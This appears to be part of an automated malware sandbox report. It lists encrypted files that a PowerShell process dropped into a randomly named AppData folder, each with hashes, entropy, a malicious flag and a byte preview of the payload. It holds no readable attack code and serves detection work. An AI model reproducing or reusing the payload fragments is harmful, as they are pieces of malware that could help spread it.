Preview:	..]A./.)...^..C..1.'+d..]1.x...m]!G5.o..z.(M......9..pN..u....8p...S......5.q.XXF.2V....7P....C...M.X..d....Eh..X...4. .....A/.E......,T..#......w..v.-.<.........p##k..&jT..../.W.(\CO...H7Z3.5...!....7...0.= .>..v.0.F@.Wz.6<...8.>..O%.B8.3r'J..%o.<Z.n.]....xh.J..e.]vQ'.I..G//.A.Ws..o..7.g.m.D.(>kQH..C.lU.x.Q...a.3..o..&..Q..T......O^0.p...!}...^3Y.3....RY.....`.......U...).6.+!&....Q....Ow.,.."<K.V... ..(I.C.`.j...Jd.,...$r....k...$....Q@....z.1...)....'..Iy.....~...R....W......x..W.~.N.C.h.V.@.&&_....I.}..T._..[).e ...\.lh.....c....4...>.@.&Zk....\.!-.@.9....EdQ?..1&.a.m.dB[u.v.....S.u.Khc...,t7..k/g.@..&.\|x'...Q.5.dz.n.D..SIJ?}.Q.!._..O...<:.?.r..z....;....=.R6.".^(.+...fR.n.=.Z`.(sc..Yr....>......X....vn../.....>.'.....b.{...B`.T..o........V........I..q....e.:......D..}X+4.c.v.J....C.T..K.,.[..h%..2.W..0.=...v.....).4..\i.P..?.......6......P?..6QH.>..;.2.{.........t.o.F...)..H}.%..%...Im?b.......F....H..&...h]....9.?+.0*3xyVm.#.7#E.....b..

C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\YWbZvlsKnQLhXGx.YCNXjAMFwz Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	107638
Entropy (8bit):	7.998095872741243
Encrypted:	true
SSDEEP:	3072:uj4cR44oX8lxTa0g89zCIQTVTyMF0QUpAqxUy9OpVPVc2vBw:uj5Bogg+OIsIMZUpzuYOpVP+2v2
MD5:	C9573C715FCDA4ED9BCD5A0A64BE20A6
SHA1:	DB5868DF84E5D6479FE5F5D0DE797B3389701C81
SHA-256:	683D0E0410A5CD4F069EA11C7E459E2C24ECCCC6375945081C714D478859D995
SHA-512:	1E8F4D8A7756732AB0074AED4EBEF51A1B61EDB9B4EEFDA89E4FED6D953D7389C4947C5C8841DF1E6A9BBFEAD9733C33F204A24BF98368141A562D1E37A7814B
Malicious:	true
Reputation:	unknown
Preview:	,..z......>.....J..<...l..#k.Y8[.n.^.@...lC.......}.i.....,Z.j..P]GB...#.&....y...n.>X,PG..P..^f....a..._..Y.c.4....l..X.e...vM6...8.j..8.....`.T.P..I-..@.L.~.nf.......) a...sv..!..8.M..[.v....3J.}...kO...T..}..\B...Q.Iu........v...]..^e7V....:\....,.......?...W.............K..a......&h..bus(....A..+.4e...Q....0`....fmNu.,..O."..4c..3.2..Bm.q.ma...\|]c..8,Fl...+C........[..@. .`......?..P..C.........~..~\.....E.../.{8...G.hg.Q#.Q.v.\|...NxTuJ<[....E(F....Zf....&..m4P....~cRA.C.I........Y..\|$..4..n\Zh..O#O........b.X@......w.a.(X&..A1.n[]...a...r..0Ea.~....I...k./.1....D.u..\..1......eG...d..'...U.Fa..:.V."P.o....+..E5.~.,.b.q..4.......>._........Y.+.j.v..X.o.&...b..e.....'....,...t..x..(...Z...\...<V...O..T-C.ux..3.+.U}.`I..^U),.t/.N(...SN..hv..({.%...`..........I:..^2....c....I,......N."[..{4X.g-.5D.q*.....%....m:...k..;......xT........Q..>G2....9.+...+.y.....-..."m6.?.>....2..>B\q..}k..._.Pv.....p.%.c...t=...n..&....16....!...H.

C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\YjiKyOrcJwGk.qxvfbFpwEmY Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	86405
Entropy (8bit):	7.997799831254319
Encrypted:	true
SSDEEP:	1536:mpGWmAuRfYvwf3tvqC4UkT/MTpDVlTi9q3p1nfYtVYms9beSmp8HcI3k:GG7lRgvwf3tvqC4UkT/MTdTMw1noVs/C
MD5:	2617C607904CC32E00F71619E98F9B73
SHA1:	B7059DC2AC6C5204A9A3C00CC8054C66C276BD93
SHA-256:	9A3EFBE69930DEAC8FB2D0FA7D601F17D360E3429A71C68012F3BE526FFED3B0
SHA-512:	335BDBC444695F296D7EA5FFB3EE28BF12B7704FA86906B52C81229D45D6D0D813951B08C9A874044FEA46994185E3E55BD15CF371CB2B49D64FA3E06192CA22
Malicious:	true
Reputation:	unknown
Preview:	7..W...R..:..d...1. ..A...-J.O.}.t.W..r.j.[m....}.Q.........%.=.]!N4..A....Y.L..E.....QF.A0HV..To...j3..Iq..2.Br....q.R......c....X...%.-.E.....J...Q9.\|Y<...g.....>g..L:.N...S.}.N.iq..(..)..B.<..q...G......@{+...p.,.?......uQ..H...r-"....".Q.W....q.....6.8.Q.....B.N]....ib....j..6.P..b13.^Y..GK&}.M....s.....Q+...z.Ib`.......q.i>{...n.....q.2.-.....Lb.Gc?...X..p[...kI`J...bC.....#..w..~z......[T...q.S.4M...[Mi....r..Z.pnt}.h......RtB^..Z}.l.M..p.;x.a._.Rg.7....rG........D..Z......M.#.t.('..Ci..n.V...8...K...\|.t./tAU#T.{.\P.=.wt.g......Q.}E%...t-.3q.G..]..[b(k.O..^.>......6.GWi?T.AT.B-...a.$T..j..'....n.I..vK.#...6.1\|...g...,.jATf.-...ah.k....#Xo.4.nT:W`.......m...e....g..f)....5J..k.2Z..Cy4Q2...['v'Z..V7u.....f.[..2c<7x.r.3...a.#.x.%/...d...J.m....." .=..^+.}).C\..._6..(.m...`[...8iX....sD.W....`_l..M..wT......M?..X..?.).,.K'....(...nL<....\|..]..I.....$..a...r.#.0'..=. .bq.g,...B....~.Xl.....X?.6}w...(...S.. /.6..X+.?..\...4...6.

C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\YrjtILOFhSDUuW.xBCzSJloQu Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	192510
Entropy (8bit):	7.999125977496786
Encrypted:	true
SSDEEP:	3072:NwMH0sr13ey7jDt4tztLaPquIkJrlfIlh/KwTC3BlipTQMLT3gS3wL2lD7GV2JBa:NX0KZ3Tt4tztLap1JrlIlNjm3apsagSA
MD5:	74E7DE0EDD7C3B34F296BDBFD96D249F
SHA1:	C1F9E7DBD18F37768F22D861FF3E685B45E490A3
SHA-256:	F4134432D72C4480CA45740B685E140608470D507F6D57D077EB4901CE9E3191
SHA-512:	56DB79C8776F81BC7D1C9F0028BC16D3F967308617024D42A5D52D28858ED93BC14AC859E8678021C6667203D6E8BB4FA6867D03CA23AD37837FC47816E80F27
Malicious:	true
Reputation:	unknown
Preview:	..h.P.x.3........VK..c.....29.....Ls.!.?)@....[E..57.....[....e....05O}.#..i......l..e....../O.w%...'....m.yb........<].>;3..\...D-... .. ...d....);.}..e....+.O.......:..g.#d..A.&3..&<.o..[fP._].t....F........fX......X..VT...Y..J42.5DR..1.o.......]..n6..o.^&.t.4ss.s..N..........h.{v..`....t..'..4.eD.h_..g..[{R.[...t,O..k..oc.Y...O$...q....wg".&...._..........Yq7B....V..e.x..<....~..R.......k~.a.......LS....}\|........a..yD..<Yv.R..(......-..nC...X.&.d.u9&....n..b-..sx.x.3R.....v.....a.di.N.).C..)..V./.s".....:m...D..."l_t).......QA{.u...p..Q0..4.P.bAx.V...S.1.kS.....H..d..K"..../.....u....>..............JO...... L.X.7+Ks..#p.Ebe...2....s3o<..c..r.qV...R.g....G....d.tc.....6........5-z...8...)'.]....".;.........6j.Jo..n.+.........G.B.3..&T..k......C{..&).......?a.fP<3..\...e.....C*.Y.q..&...r..,.....\|.h. ......c...;...}1...Cd.G8J.....:.:...E@.&.~.... .D.o.......!.z.....IY........bH..o.sW7.^......K:.!,P..C.....L.]B.Yk.g...ocz.1'R\TA.5...+...E.....w.

C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\ZNUfdQETzkiLmtPXlaD.pEYRjurNsqHJPCZfok Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	146746
Entropy (8bit):	7.998704648205536
Encrypted:	true
SSDEEP:	3072:+NHXI1C4QC1xh9sRXFIbO3pW6ZVh9nGMKg9ogwEGUyYu2+:+NHXIcq1bCRXFIC3PLh9nGMKRVEGUK2+
MD5:	C48865A1ECA59BCAC2CD2DE90F7BFA81
SHA1:	C8ACA24B71258ED1A6507C1677F53B3233D6FE06
SHA-256:	AA3582500863B84CC8323BFFF7C94960B84E35CBD7F960EC78851A10AEE27B26
SHA-512:	2CBC33403868CED785096E80BDA0BDF51023BE69CC2BCDDCB95C600C7F1896427F03D742F02EB58FF4ACA69C15AF6BDC272F7146E520208EDB42CA76D26D0459
Malicious:	true
Reputation:	unknown
Preview:	.oQ..t.8Ni.[.-.<...........hU..l#.<.R..o.(.[.l.......V...TK.m.....D..89.BWbg:Gw%.A7...A....Wsn/q.m...<n..]..2...&T+.v..X.;...'.X.v......o..nZ.{L....z..a...c....7..&..Z......gW.#..B..+....T....C...9.0X.....<..?...v..[.....LM8..#.&F...@P.V...$...y.z6.7Y........F...>..5.j..U..8...H....8b......Dl.fonDyC2..X./U....+.......K...F..AO..t..UR..Xm....g\..`.~........8.?..3....RT..p..Z.l...m...Zs.G5.M..).V.+A..v..;.).."..?).Y)d.V.".k....3].+..^.7..5G.5..ET..4..T.^...q..0b.i.,..9kJR.6..1s.].c=.P0.'....k.,.......REy.(.,...J.l],..J....:(c.VtZUO.....O......Uef.S.;..{..v?..C.E.\|.h>M4/..w.........w.c.!.n.QvC.%..5Z.(...aLcX.ZZ.....nF"...L.......?.q.?...'.`\|.S.s....l..drUps.O.C.$....`..........w....Klo.'...d.`..-.....E..:.1?!.wj8S=...C.:WH........Rw1....i!.Y(.j...K8.v..~.P\...<..........M. .v.w.d...N)(.sqr...Vj)..;.b'.L.^..i..RTz.$.s.."bi}B]4....S._}U.g.0...KpxE@\|q.a.....*c....s.a.Y..sWWw......C..^.M....j....U.w.q.#..F2.wfG....B.....,Q.Z..D.9n.

C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\ZPsmtlOSDBajzYRUMX.tIizPswRDdmHeukF Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	127470
Entropy (8bit):	7.99864012192272
Encrypted:	true
SSDEEP:	3072:qUeMUx5lyJo+X0VupdqhjFgwg/Y3neP3oO9TkCpq:H+VVaiuwV3eP3BTU
MD5:	E5E37517F817EBCAED6987ADC360CF69
SHA1:	7C609AD4637C25C8F3722C682BACE961BF0990BF
SHA-256:	4F184B4F83844D3FD44ACF3924E8EF82DD51F1047364B8DBF65C986BC7625F70
SHA-512:	366A080197C0D05754B2B8454359B71B9452AF7928E4969213449E99F300E755B54442877FBD93C97105586814A7138EB8B377CB9D2124B4EEB82BC648A7B0F9
Malicious:	true
Reputation:	unknown
Preview:	.../....N..8Y.K..Z.ip..B..........~.b?.k........7Jz4-./.W..#.oP[..g.1.02o.......bt......Ng...G.Y.#.x..DI..?.Q.a.....2.......'..A..gY.n[...W.....j....<H.}.....MC...u^..B0..R..;.]!.i.2.6;....B[..D....w..W.....9E,.NZwb(.P/....?..s'...5. ..m..2.../......H#.....l_m.'b.9.E.......Ak.v..8.<%.....F\|..../k'..K...6H&....u..w&...6.'..w.w...+..F.........&...EO....M.u...M....+.c>=.:5..Q.~....r.'.A.,r.?...%UR.<T.....f..$...P..H.7.F.V.9.,R,..l.`.^......2.&.z...~.;.'r]Y~k\|... [.=.<,.'t.O\n9..#8PO....NT.)'....o..\|l.Qz.W.#..E......Z.QN..x..sXW.z......n>\.Ni.pD.C74.dF..8...!......&..j.D..}K.../ "g......Y.;..}..}..w8-H......Z,...k...)....[.J.<....9.P\|....SIR..K..h.}........s.....K.....P.H.9=..q.=.+.. .:..8f..jQ..b*$c.^..d:.....G.....eII4...yU.X.Go......K_7.dX..\|.......x.........m........nP....k......9SF3.fko...>..t.b....[(O.......7....^.8.~.h......vp...+.+.I...r.k...wW.pd.ftp....p.`...g.]j..H:h.o.6"...4S....BQ.....vO7U....c.+....[.r{........'JL.GV.....E

C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\ZjwoclQHNa.UJolTCPMfBdFLSqjvWs Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	191642
Entropy (8bit):	7.998909642908575
Encrypted:	true
SSDEEP:	3072:g3tz85WNFyjgBSHpNGy/NFtSah8i9ptWf4h7xre2/LTUyXfkMw11:yQCyrpNtFF7b9zJtRe2/9Pbw3
MD5:	44DBD745A220D6E09B00465E5EC25AD5
SHA1:	D91D3FD5A3F4957FE5988DF9A106BAE577C07901
SHA-256:	7F893B1BAF2EF9CDEC5DB67029410155EA62EA00A8C67BF6CD27A6B48C68805C
SHA-512:	7E86DE7D3BEE9B0EDD095A6EF431DA138BC62F56E8A7005F63E06AFD7615871B23FDBB7D66FF7337B610EF805D4FBC10D85C9ED4622E25EFF713D0F99A80C935
Malicious:	true
Reputation:	unknown
Preview:	.H2........S[....j....%".b= 1..?...9.jt.@...>..1.}i.........r..?}rgUd(}.......T.K...e...+..0^\...I..qU...f...wf...C...\8..N.1.3W"~./.^.9m..Q<o(1..p....&.8>SsG4;s..>.7..J.......p..iIq.y.....r.%O....h...wy...u;..V`......A..m.D...+V...U]e.[{..:e..n.....g'..v.4x..I..\..m..f..QN..G.-.Nr...Kl.[&../...3..6.\|`..;.W^...r.=.....?.."]4:.....x.k@..0]..I..........=.C.].WBV...}..\-.@.x=..g'..O..DN....4)..q.?.t...\.EX......#...3...W..;...R..&.9.....K.=JP.k.v-@........._,.G...t..g...g.\.H........c../5...:.N.Xsi....C..B2S#2.rQ{,.$...8....Y..BNr(....QI....iP.!.4cz.^.{......Jx....../\.O^T..z....b8s{oY...-0.W.p...a.d.D.N..........@5.ry.#.Ze.N(.k.N....,R....P\.>./.u..@k.y..T. ..&...L.k..dHB..u.0.M.]..Ra.&D<b.7Q6D.....`##.)8{rN#...`.3.nn'.a.....0.+.;....Z8....>..\|.._.Lu..\|.i...A?....C....U."..................E.O..............o..+..#.9.e...E.cX......{.@./.,3 .,.O..8..f...B.i.....9GJ*.7....K.`..........}]..0Kf"&........?w$..D`..F.Y(..s ...pO>)...]+.). ./..k.e&...d

C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\ZsjwOleqGD.UzRqbtlWnYJemirF Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	166174
Entropy (8bit):	7.9990095930349945
Encrypted:	true
SSDEEP:	3072:c3XdROL0DM35uwFan21UCpit+KgyLOMaoJh9b756hOtrLmuhgYeqFjSTnwGpqYhQ:AbTD41e+Kgylas9bF6hOt2u9eTntpqY2
MD5:	5A95A90BF501927C3D1B778784745F2D
SHA1:	A0ED2ECA44286690BCD25C12B0D2B2E47E4CFC7E
SHA-256:	57F07C9C8711FBDFBF1D884B963234DC27E4CF5ACE68B1B4973968A168AD8EE4
SHA-512:	774A1C21485D29F7DC6A3020A38DD8B12806D45554F8BCD5D44C9B7989B17BED1D9800D289105654A8AC78E6273DD55036345855021DD0674A6A3C9D41A043D9
Malicious:	true
Reputation:	unknown
Preview:	s.......=...P....Br..{?...QG.....(..H..U.f.\.$..N_01..C...^.1A...&...CN.....!.#..@,x.u....)....q.........C..I...qW....SN..H....-/....$A...B.BH.#"N...\...E...S......RM..?.....6...@.j^,YF.9.'..D...u.....W.........@A..g=...8.RQ....J&?(...i.(.....1$.`......Xb.`.^....r.t.[......!,..;<.Q..tr.2.2..z.].'.2o:\|.}.:o{3....dP...M.......z.....Y..:.P....#.........d5......,=..b9'..J?.2......\...i.$...i.E.........&...2.6N.....Gp ....".]x...t4.b..Js.....D.g.....Y......b.-...mxc..d.......Jm. g....TO....m./+{...4.K._{...)b.....4c....Ar_..L...3h..a8.P.1Z....`....j.....eacq....f R.m.[kUP....E....r.c._.D.@..a..@.<.]..C8...r....e.n..}etl+.....Qy.Vl...+~i..G".*o..3...#.^...t(!-..0x.0..7.M.$..].......I....{}....Z..P.x...F}U.RP.K.7..........^..sXb.5"....sp.4.(,....j.5......wSs..)^4,.sQ.r....D'..N.x..'.\..'Rf9.PyO.pd.....x..K....>.}.n.w4. C...A.ze....l.9=.?..E....^...(...9..z..+.u....0.7'...x..#.c.......1.................C......C]l.....{.r3.:.tn.1....g.C..4...

C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\ZyHKjponqDh.wtmhxkAKnVpBrPTe Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	165929
Entropy (8bit):	7.998906747871865
Encrypted:	true
SSDEEP:	3072:mNE0fCCzxcEUQsvJrqNxp8ghzPKs8PLmx0sagKBNSL7GMLJMi3wapku3JdKar44e:W6KxcEIxwxpUs8zmIxNSLiMLaan3rp4B
MD5:	1AD1538193971B831BCFC2AF2AC4A084
SHA1:	065CD5F2669D529FC9871B373F9FFC5588F71AED
SHA-256:	AE4A268B72C9E944D241AB26B4F5F5E92A935B184B3139F46191CAC4A1D841C5
SHA-512:	56B254F53A6824E8C2A2ECF385A6019CEEB13DAB20710EB5BB91154F9D0369B4749D246F842B0636E409E43E7B0B5BB126334E43535D7D36E6E4C29FF09CF245
Malicious:	true
Reputation:	unknown
Preview:	3..?.=.d.~#g...p......Cm......{.......a..:..j.d!u5o.ST...M5.#.O..-....U.X9.2...Z.v...~G..1U....../=........L.GJT....%.g.....F.qH#....^ie....kq..;.A.'\|.u..b)....$....H.h7.p.)..../..<.#..~.h$...G..uH}.F....p.... ..(U.]...E.CFxa\I...irr.';0l.'..^I....2...n.a{..x.t.8RC.t-..J..v..=......qvV.]&C8`..&..\y..l.%.a.a..l8.{...wL...s.].!ab....P..0.Te.E.......r;.f.'H.m..WnO/.+R.#..{..GNI.R......c..3.f.~...5OT..^..>#.y.b.A.<.F<WLH...Y.H5.oZx).2..%........=............Y.xyZJ..A./.!y.6....~.HT.H{.^.@.@iB.A.....p.H.iU...@f.9$...mQ......P.M.'.......GJ.P...y.....\|.;......\|.:a..%R[..3...qF../u..x[.].&......c....`P..I%....".Sc.....\,c~.F.x...(.\|..a......%.bH5.#..T.U3..l..>..4t''=......w.=......m...'..M...h...y: ....m........n..8.4.\.2>.<.t.L.w...;.Mf.H.-...\|..i... .Mq..0zi.alC'E....:N...in...t..>q.Nu...5l...\..6O8c..h...).p..O...j.4..f.........G;J..TD.....}...v?.;[e..E..H........y:4.?X.F..%.I,..c........./x...`...'.Y}..).#g.n....4R..t..aj...=.&.....f!...g

C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\aeRSxfzcUJZPwo.ndPvakbgHREXmyJfG Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	172448
Entropy (8bit):	7.998929237540738
Encrypted:	true
SSDEEP:	3072:Vp/CfT3JP5q9QXcK6EYMM07XtJpjOa/baQ/78C5do2:VpYTZM9GirO93SJQ/wC5do2
MD5:	4D972F35BE59C11CB906A2A349BF89C5
SHA1:	AA03E726836181B197292599BA7E2DB9CAA33241
SHA-256:	357346AEED60E8CCB65A8E6D10C54FA461EA10BF7E13EE137421D8E480936CB1
SHA-512:	F3969EF4ABA92AAE6582173E0E9015923153CB763603A1A5F6C54778620F7E1220B9B2B7E4945A2B6F07C015A6CFD6778F16D4948AC9AD3771116CE051AABC57
Malicious:	true
Reputation:	unknown
Preview:	..8eb(.... ...\..}..ss......\....Fv...+L..v..Re42.O.wUS.....,.....F..Q:}......_.L.&..Y;.^o....._.O\|...<.l..L....8..:T3\q......Ge.....c....qGz...n.$.. ...r=x..I.}[..}'.Z.I...O..Q.XA.}.;+.v..,%`...+.<F....w..."..l...(.Q.s....f../W..bSw.J{,.T.u.@o..B......<..X.4.b.W..-.1.g$...J]C. ..T.)..e..W#3Va..h..=.&...rB.V.a.n...-...H9.D.I..$h....c.N#....Z.[w.;.....f.#..oa+=p.*..........a....x......)2?z...1.Kq.hKM@..@hS&....O'R.=M.ztXe...0;EG..,G...LOF.R..v..Dk4.u...Z.#.a.H..e.....w".n...&...DP\o.t..."..5@-&...pC..X.'.\....Nq.n....8_.`i.-Z.V.5i.........&"...6....t.-<.M...HXy.V~.nk..WZod=p.^$.Bj...L.j.....c.h..L3=,......_.m..<a./!`u......;H[..-V...sO. j.(..&A...yof..!.........c...R.U....b..Q..q%.Qn~eSCI{.?........vQ....-..<.,...~\.h>..R.\s...\|....RI@.7.w..?....8l...........u8N7..+.al.`4F..32..!..F.1...M..h..@............\|....(....t..u....+...............{.e8z..H....%..!Q[.t.S0.R.O....N..O..S..2.../.....p..y.(~L..JA.a...Yy.....B@.s..\|..C:L..'..l....#

C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\apEDckxwfTK.uAhIMUapmgfWirnV Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	189076
Entropy (8bit):	7.999104296801036
Encrypted:	true
SSDEEP:	3072:eiYSW5jviy8hQCCiJJTvuRz8N3mEaFZOlfzgPEZ/1pzA8nkD6LL:eiYSW5jvF8lCirvmz8N4FkOEZLzA8Q0
MD5:	CA91E9AB340000086CEAA458C24FD32B
SHA1:	56073454CAC6B1F5905D99C1080D6E4F1DED8E32
SHA-256:	E6ECF7EA33DBD4FC7D6FDE258405C5E06B3B866F8C44D458403577137FB831E8
SHA-512:	3D23902390CF6DB7624CCAD4740A985FDED490A9985CF64E7223272E62C4AD27173456E126D07D761878124C1D86B9790BB8D9248936914A2A4D6A093E1E8B34
Malicious:	true
Reputation:	unknown
Preview:	(L..>w..~.Q1R....v..:.dn...v..Y.".....vuq!..8f.>{y.Z..(.....#.....&.}k.X...~....8.3.Fg..6.........~z.$......aZ.N?.boP\.R...pm..I.)..@67..$.C.m'..G.s.M.'+..A...UR.8.....N.+.z..u.....o..w..).(...x.....=.%.!.....9..)k}.[.o.Y.{..U.....E.....I.q.....[...J3..Kyb..b.E_..................u.H.FA..M\|T$...-S...:..=qh...!.NP.M.;`...[y..-0..s..Uy.;..~.[.[...e..2.t..;TC7..("...d..2..cP.....E..Zl......G...8.........3#6.g@..x........~.........{.tj...c..s.T%....)u..Jg.Fm....7.4.sYKz([ek...}..cc...{].mMJ+L..;b (/a6u..W.V\......W.4..M.,.0....\w..-q.......}...\.y...WH".>.i./lU.9xb....V.a.....;p...(..i<.!X.'..F#k._..v...A......?....#]p\|..9...l~$..w..[...}d..c%...Q<......;'.m$..K..iy....r..rBY.....}.xr...VY.3.........f..t.U.......NI..U..?.........l...C...;...y...J.W`^@...Cs....M.6..+1..n!u..VAND.w(.{?..........C......=....1....$....\|......C...pu...q.=t....^.X.h.~.B.$.s..4...B..L..+.y}..`...!...3M...~.~...v2WJ6.x:.<...'..yq.....P.....ku.......v..KG......#.

C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\bBhYEFwTiuvrQSo.vBEypAPMjsVuhr Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	92340
Entropy (8bit):	7.998128326710044
Encrypted:	true
SSDEEP:	1536:sn0NpZm+vDimQ1d0EGDwYBxEqTupdFSnDv6cBBjgljHq0Ijfq2xa1DPFFvga0+Y:sn0zdikEG1updgnb6cgNqRjfsNFIa0+Y
MD5:	2AF9F2EFBC716547B4AC6914157997A6
SHA1:	F7689445719887AE4C7AED848162865270AE5DC8
SHA-256:	1E5BBE80347F49A2AE241468256294957D739FC4A9683AB89FE0257111B3D600
SHA-512:	D5B5BC5DEA5E376A22A56CD5FD4334C553C69DFF3B763876DE25145419E809574C90727B37A874B9E5FC56BD9C68A4614C716AA052C085D95114C74273A12404
Malicious:	true
Reputation:	unknown
Preview:	.......@..m^.O..@....n...-.A...S... ....%/..mi.[.!.d........aLO0.F....B....k..{.?....WO...S.....x&.S...k...hg..\|s.C*.S..&.}/..V.T....4.IT.7.$.=Gp.~M8sf...:;.-..R..j............\......$...H,&.$<J....p..tO=?'gIt.C;..T.E.P.^x.I.Y..U..g ..5.....T..y..F.[H.....a.N_.j5?.^..^.......4<Q..nx/4..1...+.FV9.8z...X.G.=...t.....)..PR.\|..a.S9..v0..`.#.<\...M..r..............wO....g..K..e..v>...S.5c.Xo.5..%.."........@..0..<G-.....3.LB..g.d.^.....1.:....'..W..;u..R..h...$~./L....W.&Z.$`...H..]Z...n.D9..UK....Dr..c..:v....9...@[.`.O..o.x..i.j...;\..l..l....T....vQ..$.....9.....x.d...ab.....QK.UJl7....PB..\|. .....2m!D.9V....]....t........a..........b/(.~KoC..t?.....[`N...IA.........u....k^.......\...0.=F.a...v.%0.....:.....D.+i.l.$>tXV..[."...^.....j...`W..X.....Qq...S.......E...0.n........lg.j....4...sq.{..1.F....N.I.r#..yY.#.$N.9,#.Z..........d..b0v.........J.q../2...v2B.............'j.W..a......5...a..=f..%.M..r.......\|...4..#.a...G..v....1.

C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\bEvPXVmuxYsKzOZj.WMeyIFRmLdcnNOEQqjD Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	183131
Entropy (8bit):	7.999018972031902
Encrypted:	true
SSDEEP:	3072:/TU8FBZBJ1CEj3dgS6KtoG1zw4NFiR/2TmPiP380vst9v/XRIkmJclQcmILNR3A5:LrBBJIEjtgSloGJTNtPZvs3HXRIkmJio
MD5:	8EF0DE3BC3029B30899DAD9AB347C640
SHA1:	499E282F1A92AE3A0870B0A28A625D6A76B86D7A
SHA-256:	7F5B2B55230474F6972B04BB14D5B0D447BCED3CEDEDB626A734E09F57A1920F
SHA-512:	ACC3C75D9A6CEB10A355D25E738508DCF42267101F3F47467DA1D0014BEF3BE8545DA6A59B972CE0E61E243B40765C7C1BF02ECC968B7E59D4F3AA61FEA715C6
Malicious:	true
Reputation:	unknown
Preview:	..Ssb.........%..\.x({.5.j..E1......0E=f."../.i.9h..-.Q.._Y..r-r...a.3........-......;...T..~.7.T0.4...P....}._E...>U.w......?Ox.n....Q.o. .N.fWj..J..x...".tS....NL.5.W..w1wpR\-W...i.Z/2..T.......q.g..o1E.^..nbCm.M.G'k....)..JnQY.~.q J.{.?....p,^.;.JCc..F'g....S.h....,/..........:.F..S...B.a..0..S.8.43.....<....=m3xe.J....{.....h#W.R.........V\|.K.m.......4.A.<z.o..m0.m....<.%.=..T..n.z$8...g.........e.Fp...0..8.....pI....:C.8Z?(q../.'#..I........[....6.-.f......N......7..d....ZZ.>..s............j...r.I..3.\|.M.R....oB~..S.....L._.6Ov.mqZ.esy......A;'.K..-Pg..Z....6[.Y.s.K{...T...b$.....?!...(2=.%..&...t{\5.l..uc.r....7 .d2.{..../z..@......H.s*.....N........X.g.v.eF1....L@v]........{...4x.$.[.4.._..[..c..,..I:G.\D.2mi{.$...)..W.w....e3].$...J......i..6......Nh...7D.:....oH.:..dGY.yS..St..&.`{...0.]-a...:....Av.2...h.o6..o9..T..+.......HC@.....7 ...1~.F(.F...VJ8YF.+...,.a.d...3.%f....;..x..`..K.Y.......4W....\.0.9.'.S..1.x..4.G q

C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\bHwprZxgiaM.ADWxBjgpvreEcJR Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	181479
Entropy (8bit):	7.999036694263066
Encrypted:	true
SSDEEP:	3072:raLZ1Or+6zKzJ4sjVMS8y6G2gglAdFLKpXoPfO8QMK3wp+8V1hT7K:2l14zIvxMvyIMU4PW8y3wpDV1hT7K
MD5:	4858E95F413E2CC4C41192D6EAEB347E
SHA1:	3FBB1AAA712AA73325A8765489403682D6FFA5A5
SHA-256:	8406F5C68A16412D443ABC726DC4EFE25BC8BE84C1E14FE6B6215A3E3DFBF667
SHA-512:	EFE1528A5B0E90EB9F24579E2FCEAF4C583E8264C1D2FB0C91C03CB10475A8B5B4D638A007E0139858B3AC27E7B1E7C635142EF32854F6343EB1B0B632BCFE01
Malicious:	true
Reputation:	unknown
Preview:	m..Qo#.....m.<.5...E.GG./....H.4m.....~..t..<:f.%}..WR(..hO.'.......20.('..G...2>....g.2.&../..dJ...5\|.......,&t.c.&.A....wE...%..3.....^.\i......i>_@P.'.p}o.....k.Y.1.O...~..4.a...\h$w.....2..qwW.....p."^.:.1.G...<.\.-.R.UK.E.o......LQE..l......;e.R^Z}....SwM&..6X......U.I_.24.@..6...n......L..O..x..'.lw..D...X."j.P=.N..;...'8..J..ul=....S..2$&.\|K)..IM.kt.3..In..."G.^.V,GMwg...m..B....(.{.b.j..\|%..5..~z..V.p.L*.c,.9.A.9.v.q.....7p.."J.........%.p...U.B..%;...yA..G...aL........z.p!.3G.A./ex/......<8..u.('.........[R...S_..A8.&..V7W~$........I....3NXz.H.....`....y..g.?.t..S.sr.......6u.F1..H...iSE.....8.(..s{.......Iy.!c..+rX.. 